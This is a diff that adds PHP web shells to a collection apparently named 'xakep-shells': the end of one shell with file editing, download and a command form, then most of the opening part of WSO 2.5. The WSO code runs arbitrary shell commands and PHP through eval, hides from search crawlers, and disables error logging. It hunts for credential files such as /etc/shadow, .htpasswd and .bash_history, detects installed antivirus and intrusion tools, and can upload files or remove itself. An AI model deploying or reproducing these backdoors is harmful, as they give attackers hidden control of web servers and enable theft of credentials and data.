+	<textarea name='content' cols=100 rows=15>".fedit($file,'r')."</textarea><br /><input type='submit' value='Save'></center></form></td></tr>";
+}
+
+//Setup the Action
+if (!isset($_GET['action']))
+{
+	$action = dir_scan($current_dir);
+}
+elseif ($_GET['action'] == 'edit')
+{
+	$action = edit($_GET['file']);
+}
+elseif ($_GET['action'] == 'write')
+{
+	if (fedit($_GET['file'],'w',$_POST['content']))
+		$action = "<tr><td>Successful</td></tr>";
+	else
+		$action = "<tr><td>Error Writing File, Possible Permission Problem</td></tr>";
+}
+elseif ($_GET['action'] == 'download')
+{
+	$filename = $_GET['file'];
+	$filename = trim($filename); 
+	$file = $path.$filename; 
+	$file_size = filesize($file); 
+	if(strstr($HTTP_USER_AGENT, "MSIE 5.5")) { 
+	header("Content-Type: doesn/matter"); 
+	header("Content-Disposition: filename=$filename"); 
+	header("Content-Transfer-Encoding: binary"); 
+	header("Pragma: no-cache"); 
+	header("Expires: 0"); 
+	} 
+	else { 
+	Header("Content-type: file/unknown"); 
+	Header("Content-Disposition: attachment; filename=".str_replace("../","",$filename)); 
+	Header("Content-Description: PHP3 Generated Data"); 
+	header("Pragma: no-cache"); 
+	header("Expires: 0"); 
+	} 
+
+	if (is_file("$file")) { 
+	$fp = fopen("$file", "r"); 
+	if (!fpassthru($fp)) 
+	fclose($fp); 
+	} 
+	die();
+}
+
+//Actual Output
+echo "<html><body bgcolor='black' text='white'>\n";
+echo "<center>\n";
+echo "<table width='90%'>\n";
+echo "<tr><td colspan='2'><center><img src='".$surl."?img=banner'></center></td></tr>\n";
+echo "<tr><td colspan='2'><b>Operating System Information: </b>".php_uname()."</td></tr>\n";
+echo "<tr><td colspan='2'><b>Server Running As: </b>".get_current_user()."</td></tr>\n";
+echo "<tr><td colspan='2'><b>Current Directory: </b>".wordwrap(realpath($current_dir),100,'<br />')."</td></tr>\n";
+echo $action;
+echo "<tr><td colspan='2'>&nbsp</td></tr>";
+echo "<tr><td colspan='2'><b>Run Command: </b><form action='' method='post'><input type='text' name='CLICommand'><input type='submit' value='Run!'></form></td></tr>\n";
+echo "</table></center>\n";
+echo "</body></html>\n";
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/wso.txt b/xakep-shells/PHP/wso.txt
new file mode 100644
index 0000000..0768fb9
--- /dev/null
+++ b/xakep-shells/PHP/wso.txt
@@ -0,0 +1,1523 @@
+<?php
+$color = "#df5";
+$default_action = 'FilesMan';
+$default_use_ajax = true;
+$default_charset = 'Windows-1251';
+
+if($argc == 3) {
+	$_POST = unserialize(base64_decode($argv[1]));
+	$_SERVER = unserialize(base64_decode($argv[2]));
+}
+
+if(!empty($_SERVER['HTTP_USER_AGENT'])) {
+    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
+    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
+        header('HTTP/1.0 404 Not Found');
+        exit;
+    }
+}
+
+@ini_set('error_log',NULL);
+@ini_set('log_errors',0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@define('WSO_VERSION', '2.5');
+
+if(get_magic_quotes_gpc()) {
+	function WSOstripslashes($array) {
+		return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
+	}
+	$_POST = WSOstripslashes($_POST);
+    $_COOKIE = WSOstripslashes($_COOKIE);
+}
+
+function wsoLogin() {
+	die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
+}
+
+function WSOsetcookie($k, $v) {
+    $_COOKIE[$k] = $v;
+    setcookie($k, $v);
+}
+
+if(!empty($auth_pass)) {
+    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
+
+    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
+        wsoLogin();
+}
+
+if(strtolower(substr(PHP_OS,0,3)) == "win")
+	$os = 'win';
+else
+	$os = 'nix';
+
+$safe_mode = @ini_get('safe_mode');
+if(!$safe_mode)
+    error_reporting(0);
+
+$disable_functions = @ini_get('disable_functions');
+$home_cwd = @getcwd();
+if(isset($_POST['c']))
+	@chdir($_POST['c']);
+$cwd = @getcwd();
+if($os == 'win') {
+	$home_cwd = str_replace("\\", "/", $home_cwd);
+	$cwd = str_replace("\\", "/", $cwd);
+}
+if($cwd[strlen($cwd)-1] != '/')
+	$cwd .= '/';
+
+if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
+    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
+
+if($os == 'win')
+	$aliases = array(
+		"List Directory" => "dir",
+    	"Find index.php in current dir" => "dir /s /w /b index.php",
+    	"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
+    	"Show active connections" => "netstat -an",
+    	"Show running services" => "net start",
+    	"User accounts" => "net user",
+    	"Show computers" => "net view",
+		"ARP Table" => "arp -a",
+		"IP Configuration" => "ipconfig /all"
+	);
+else
+	$aliases = array(
+  		"List dir" => "ls -lha",
+		"list file attributes on a Linux second extended file system" => "lsattr -va",
+  		"show opened ports" => "netstat -an | grep -i listen",
+        "process status" => "ps aux",
+		"Find" => "",
+  		"find all suid files" => "find / -type f -perm -04000 -ls",
+  		"find suid files in current dir" => "find . -type f -perm -04000 -ls",
+  		"find all sgid files" => "find / -type f -perm -02000 -ls",
+  		"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
+  		"find config.inc.php files" => "find / -type f -name config.inc.php",
+  		"find config* files" => "find / -type f -name \"config*\"",
+  		"find config* files in current dir" => "find . -type f -name \"config*\"",
+  		"find all writable folders and files" => "find / -perm -2 -ls",
+  		"find all writable folders and files in current dir" => "find . -perm -2 -ls",
+  		"find all service.pwd files" => "find / -type f -name service.pwd",
+  		"find service.pwd files in current dir" => "find . -type f -name service.pwd",
+  		"find all .htpasswd files" => "find / -type f -name .htpasswd",
+  		"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
+  		"find all .bash_history files" => "find / -type f -name .bash_history",
+  		"find .bash_history files in current dir" => "find . -type f -name .bash_history",
+  		"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
+  		"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
+		"Locate" => "",
+  		"locate httpd.conf files" => "locate httpd.conf",
+		"locate vhosts.conf files" => "locate vhosts.conf",
+		"locate proftpd.conf files" => "locate proftpd.conf",
+		"locate psybnc.conf files" => "locate psybnc.conf",
+		"locate my.conf files" => "locate my.conf",
+		"locate admin.php files" =>"locate admin.php",
+		"locate cfg.php files" => "locate cfg.php",
+		"locate conf.php files" => "locate conf.php",
+		"locate config.dat files" => "locate config.dat",
+		"locate config.php files" => "locate config.php",
+		"locate config.inc files" => "locate config.inc",
+		"locate config.inc.php" => "locate config.inc.php",
+		"locate config.default.php files" => "locate config.default.php",
+		"locate config* files " => "locate config",
+		"locate .conf files"=>"locate '.conf'",
+		"locate .pwd files" => "locate '.pwd'",
+		"locate .sql files" => "locate '.sql'",
+		"locate .htpasswd files" => "locate '.htpasswd'",
+		"locate .bash_history files" => "locate '.bash_history'",
+		"locate .mysql_history files" => "locate '.mysql_history'",
+		"locate .fetchmailrc files" => "locate '.fetchmailrc'",
+		"locate backup files" => "locate backup",
+		"locate dump files" => "locate dump",
+		"locate priv files" => "locate priv"
+	);
+
+function wsoHeader() {
+	if(empty($_POST['charset']))
+		$_POST['charset'] = $GLOBALS['default_charset'];
+	global $color;
+	echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
+<style>
+body{background-color:#444;color:#e1e1e1;}
+body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
+table.info{ color:#fff;background-color:#222; }
+span,h1,a{ color: $color !important; }
+span{ font-weight: bolder; }
+h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
+div.content{ padding: 5px;margin-left:5px;background-color:#333; }
+a{ text-decoration:none; }
+a:hover{ text-decoration:underline; }
+.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
+.bigarea{ width:100%;height:300px; }
+input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
+form{ margin:0px; }
+#toolsTbl{ text-align:center; }
+.toolsInp{ width: 300px }
+.main th{text-align:left;background-color:#5e5e5e;}
+.main tr:hover{background-color:#5e5e5e}
+.l1{background-color:#444}
+.l2{background-color:#333}
+pre{font-family:Courier,Monospace;}
+</style>
+<script>
+    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
+    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
+    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
+    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
+    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
+    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
+    var d = document;
+	function set(a,c,p1,p2,p3,charset) {
+		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
+		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
+		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
+		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
+		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
+		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
+	}
+	function g(a,c,p1,p2,p3,charset) {
+		set(a,c,p1,p2,p3,charset);
+		d.mf.submit();
+	}
+	function a(a,c,p1,p2,p3,charset) {
+		set(a,c,p1,p2,p3,charset);
+		var params = 'ajax=true';
+		for(i=0;i<d.mf.elements.length;i++)
+			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
+		sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
+	}
+	function sr(url, params) {
+		if (window.XMLHttpRequest)
+			req = new XMLHttpRequest();
+		else if (window.ActiveXObject)
+			req = new ActiveXObject('Microsoft.XMLHTTP');
+        if (req) {
+            req.onreadystatechange = processReqChange;
+            req.open('POST', url, true);
+            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
+            req.send(params);
+        }
+	}
+	function processReqChange() {
+		if( (req.readyState == 4) )
+			if(req.status == 200) {
+				var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
+				var arr=reg.exec(req.responseText);
+				eval(arr[2].substr(0, arr[1]));
+			} else alert('Request error!');
+	}
+</script>
+<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
+<form method=post name=mf style='display:none;'>
+<input type=hidden name=a>
+<input type=hidden name=c>
+<input type=hidden name=p1>
+<input type=hidden name=p2>
+<input type=hidden name=p3>
+<input type=hidden name=charset>
+</form>";
+	$freeSpace = @diskfreespace($GLOBALS['cwd']);
+	$totalSpace = @disk_total_space($GLOBALS['cwd']);
+	$totalSpace = $totalSpace?$totalSpace:1;
+	$release = @php_uname('r');
+	$kernel = @php_uname('s');
+	$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
+	if(strpos('Linux', $kernel) !== false)
+		$explink .= urlencode('Linux Kernel ' . substr($release,0,6));
+	else
+		$explink .= urlencode($kernel . ' ' . substr($release,0,3));
+	if(!function_exists('posix_getegid')) {
+		$user = @get_current_user();
+		$uid = @getmyuid();
+		$gid = @getmygid();
+		$group = "?";
+	} else {
+		$uid = @posix_getpwuid(posix_geteuid());
+		$gid = @posix_getgrgid(posix_getegid());
+		$user = $uid['name'];
+		$uid = $uid['uid'];
+		$group = $gid['name'];
+		$gid = $gid['gid'];
+	}
+
+	$cwd_links = '';
+	$path = explode("/", $GLOBALS['cwd']);
+	$n=count($path);
+	for($i=0; $i<$n-1; $i++) {
+		$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
+		for($j=0; $j<=$i; $j++)
+			$cwd_links .= $path[$j].'/';
+		$cwd_links .= "\")'>".$path[$i]."/</a>";
+	}
+
+	$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
+	$opt_charsets = '';
+	foreach($charsets as $item)
+		$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
+
+	$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
+	if(!empty($GLOBALS['auth_pass']))
+		$m['Logout'] = 'Logout';
+	$m['Self remove'] = 'SelfRemove';
+	$menu = '';
+	foreach($m as $k => $v)
+		$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
+
+	$drives = "";
+	if($GLOBALS['os'] == 'win') {
+		foreach(range('c','z') as $drive)
+		if(is_dir($drive.':\\'))
+			$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
+	}
+	echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
+       . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>')
+       . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
+       . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
+       . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
+}
+
+function wsoFooter() {
+	$is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
+    echo "
+</div>
+<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
+	<tr>
+		<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
+		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
+	</tr><tr>
+		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
+		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
+	</tr><tr>
+		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
+		<td><form method='post' ENCTYPE='multipart/form-data'>
+		<input type=hidden name=a value='FilesMAn'>
+		<input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
+		<input type=hidden name=p1 value='uploadFile'>
+		<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
+		<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
+	</tr></table></div></body></html>";
+}
+
+if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
+    function posix_getpwuid($p) {return false;} }
+if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
+    function posix_getgrgid($p) {return false;} }
+
+function wsoEx($in) {
+	$out = '';
+	if (function_exists('exec')) {
+		@exec($in,$out);
+		$out = @join("\n",$out);
+	} elseif (function_exists('passthru')) {
+		ob_start();
+		@passthru($in);
+		$out = ob_get_clean();
+	} elseif (function_exists('system')) {
+		ob_start();
+		@system($in);
+		$out = ob_get_clean();
+	} elseif (function_exists('shell_exec')) {
+		$out = shell_exec($in);
+	} elseif (is_resource($f = @popen($in,"r"))) {
+		$out = "";
+		while(!@feof($f))
+			$out .= fread($f,1024);
+		pclose($f);
+	}
+	return $out;
+}
+
+function wsoViewSize($s) {
+	if($s >= 1073741824)
+		return sprintf('%1.2f', $s / 1073741824 ). ' GB';
+	elseif($s >= 1048576)
+		return sprintf('%1.2f', $s / 1048576 ) . ' MB';
+	elseif($s >= 1024)
+		return sprintf('%1.2f', $s / 1024 ) . ' KB';
+	else
+		return $s . ' B';
+}
+
+function wsoPerms($p) {
+	if (($p & 0xC000) == 0xC000)$i = 's';
+	elseif (($p & 0xA000) == 0xA000)$i = 'l';
+	elseif (($p & 0x8000) == 0x8000)$i = '-';
+	elseif (($p & 0x6000) == 0x6000)$i = 'b';
+	elseif (($p & 0x4000) == 0x4000)$i = 'd';
+	elseif (($p & 0x2000) == 0x2000)$i = 'c';
+	elseif (($p & 0x1000) == 0x1000)$i = 'p';
+	else $i = 'u';
+	$i .= (($p & 0x0100) ? 'r' : '-');
+	$i .= (($p & 0x0080) ? 'w' : '-');
+	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
+	$i .= (($p & 0x0020) ? 'r' : '-');
+	$i .= (($p & 0x0010) ? 'w' : '-');
+	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
+	$i .= (($p & 0x0004) ? 'r' : '-');
+	$i .= (($p & 0x0002) ? 'w' : '-');
+	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
+	return $i;
+}
+
+function wsoPermsColor($f) {
+	if (!@is_readable($f))
+		return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
+	elseif (!@is_writable($f))
+		return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
+	else
+		return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
+}
+
+function wsoScandir($dir) {
+    if(function_exists("scandir")) {
+        return scandir($dir);
+    } else {
+        $dh  = opendir($dir);
+        while (false !== ($filename = readdir($dh)))
+            $files[] = $filename;
+        return $files;
+    }
+}
+
+function wsoWhich($p) {
+	$path = wsoEx('which ' . $p);
+	if(!empty($path))
+		return $path;
+	return false;
+}
+
+function actionSecInfo() {
+	wsoHeader();
+	echo '<h1>Server security information</h1><div class=content>';
+	function wsoSecParam($n, $v) {
+		$v = trim($v);
+		if($v) {
+			echo '<span>' . $n . ': </span>';
+			if(strpos($v, "\n") === false)
+				echo $v . '<br>';
+			else
+				echo '<pre class=ml1>' . $v . '</pre>';
+		}
+	}
+
+	wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
+    if(function_exists('apache_get_modules'))
+        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
+	wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
+	wsoSecParam('Open base dir', @ini_get('open_basedir'));
+	wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
+	wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
+	wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
+	$temp=array();
+	if(function_exists('mysql_get_client_info'))
+		$temp[] = "MySql (".mysql_get_client_info().")";
+	if(function_exists('mssql_connect'))
+		$temp[] = "MSSQL";
+	if(function_exists('pg_connect'))
+		$temp[] = "PostgreSQL";
+	if(function_exists('oci_connect'))
+		$temp[] = "Oracle";
+	wsoSecParam('Supported databases', implode(', ', $temp));
+	echo '<br>';
+
+	if($GLOBALS['os'] == 'nix') {
+            wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
+            wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
+            wsoSecParam('OS version', @file_get_contents('/proc/version'));
+            wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
+            if(!$GLOBALS['safe_mode']) {
+                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
+                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
+                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
+                echo '<br>';
+                $temp=array();
+                foreach ($userful as $item)
+                    if(wsoWhich($item))
+                        $temp[] = $item;
+                wsoSecParam('Userful', implode(', ',$temp));
+                $temp=array();
+                foreach ($danger as $item)
+                    if(wsoWhich($item))
+                        $temp[] = $item;
+                wsoSecParam('Danger', implode(', ',$temp));
+                $temp=array();
+                foreach ($downloaders as $item)
+                    if(wsoWhich($item))
+                        $temp[] = $item;
+                wsoSecParam('Downloaders', implode(', ',$temp));
+                echo '<br/>';
+                wsoSecParam('HDD space', wsoEx('df -h'));
+                wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
+                echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
+                if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
+                    $temp = "";
+                    for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
+                        $uid = @posix_getpwuid($_POST['p2']);
+                        if ($uid)
+                            $temp .= join(':',$uid)."\n";
+                    }
+                    echo '<br/>';
+                    wsoSecParam('Users', $temp);
+                }
+            }
+	} else {
+		wsoSecParam('OS Version',wsoEx('ver'));
+		wsoSecParam('Account Settings',wsoEx('net accounts'));
+		wsoSecParam('User Accounts',wsoEx('net user'));
+	}
+	echo '</div>';
+	wsoFooter();
+}
+
+function actionPhp() {
+	if(isset($_POST['ajax'])) {
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
+		ob_start();
+		eval($_POST['p1']);
+		$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
+		echo strlen($temp), "\n", $temp;
+		exit;
+	}
+    if(empty($_POST['ajax']) && !empty($_POST['p1']))
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
+
+	wsoHeader();
+	if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
+		echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
+		ob_start();
+		phpinfo();
+		$tmp = ob_get_clean();
+        $tmp = preg_replace(array (
+            '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
+            '!td, th {(.*)}!msiU',
+            '!<img[^>]+>!msiU',
+        ), array (
+            '',
+            '.e, .v, .h, .h th {$1}',
+            ''
+        ), $tmp);
+		echo str_replace('<h1','<h2', $tmp) .'</div><br>';
+	}
+    echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
+	echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
+	if(!empty($_POST['p1'])) {
+		ob_start();
+		eval($_POST['p1']);
+		echo htmlspecialchars(ob_get_clean());
+	}
+	echo '</pre></div>';
+	wsoFooter();
+}
+
+function actionFilesMan() {
+    if (!empty ($_COOKIE['f']))
+        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
+    
+	if(!empty($_POST['p1'])) {
+		switch($_POST['p1']) {
+			case 'uploadFile':
+				if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
+					echo "Can't upload file!";
+				break;
+			case 'mkdir':
+				if(!@mkdir($_POST['p2']))
+					echo "Can't create new dir";
+				break;
+			case 'delete':
+				function deleteDir($path) {
+					$path = (substr($path,-1)=='/') ? $path:$path.'/';
+					$dh  = opendir($path);
+					while ( ($item = readdir($dh) ) !== false) {
+						$item = $path.$item;
+						if ( (basename($item) == "..") || (basename($item) == ".") )
+							continue;
+						$type = filetype($item);
+						if ($type == "dir")
+							deleteDir($item);
+						else
+							@unlink($item);
+					}
+					closedir($dh);
+					@rmdir($path);
+				}
+				if(is_array(@$_POST['f']))
+					foreach($_POST['f'] as $f) {
+                        if($f == '..')
+                            continue;
+						$f = urldecode($f);
+						if(is_dir($f))
+							deleteDir($f);
+						else
+							@unlink($f);
+					}
+				break;
+			case 'paste':
+				if($_COOKIE['act'] == 'copy') {
+					function copy_paste($c,$s,$d){
+						if(is_dir($c.$s)){
+							mkdir($d.$s);
+							$h = @opendir($c.$s);
+							while (($f = @readdir($h)) !== false)
+								if (($f != ".") and ($f != ".."))
+									copy_paste($c.$s.'/',$f, $d.$s.'/');
+						} elseif(is_file($c.$s))
+							@copy($c.$s, $d.$s);
+					}
+					foreach($_COOKIE['f'] as $f)
+						copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
+				} elseif($_COOKIE['act'] == 'move') {
+					function move_paste($c,$s,$d){
+						if(is_dir($c.$s)){
+							mkdir($d.$s);
+							$h = @opendir($c.$s);
+							while (($f = @readdir($h)) !== false)
+								if (($f != ".") and ($f != ".."))
+									copy_paste($c.$s.'/',$f, $d.$s.'/');
+						} elseif(@is_file($c.$s))
+							@copy($c.$s, $d.$s);
+					}
+					foreach($_COOKIE['f'] as $f)
+						@rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
+				} elseif($_COOKIE['act'] == 'zip') {
+					if(class_exists('ZipArchive')) {
+                        $zip = new ZipArchive();
+                        if ($zip->open($_POST['p2'], 1)) {
+                            chdir($_COOKIE['c']);
+                            foreach($_COOKIE['f'] as $f) {
+                                if($f == '..')
+                                    continue;
+                                if(@is_file($_COOKIE['c'].$f))
+                                    $zip->addFile($_COOKIE['c'].$f, $f);
+                                elseif(@is_dir($_COOKIE['c'].$f)) {
+                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
+                                    foreach ($iterator as $key=>$value) {
+                                        $zip->addFile(realpath($key), $key);
+                                    }
+                                }
+                            }
+                            chdir($GLOBALS['cwd']);
+                            $zip->close();
+                        }
+                    }
+				} elseif($_COOKIE['act'] == 'unzip') {
+					if(class_exists('ZipArchive')) {
+                        $zip = new ZipArchive();
+                        foreach($_COOKIE['f'] as $f) {
+                            if($zip->open($_COOKIE['c'].$f)) {
+                                $zip->extractTo($GLOBALS['cwd']);
+                                $zip->close();
+                            }
+                        }
+                    }
+				} elseif($_COOKIE['act'] == 'tar') {
+                    chdir($_COOKIE['c']);
+                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
+                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
+                    chdir($GLOBALS['cwd']);
+				}
+				unset($_COOKIE['f']);
+                setcookie('f', '', time() - 3600);
+				break;
+			default:
+                if(!empty($_POST['p1'])) {
+					WSOsetcookie('act', $_POST['p1']);
+					WSOsetcookie('f', serialize(@$_POST['f']));
+					WSOsetcookie('c', @$_POST['c']);
+				}
+				break;
+		}
+	}
+    wsoHeader();
+	echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
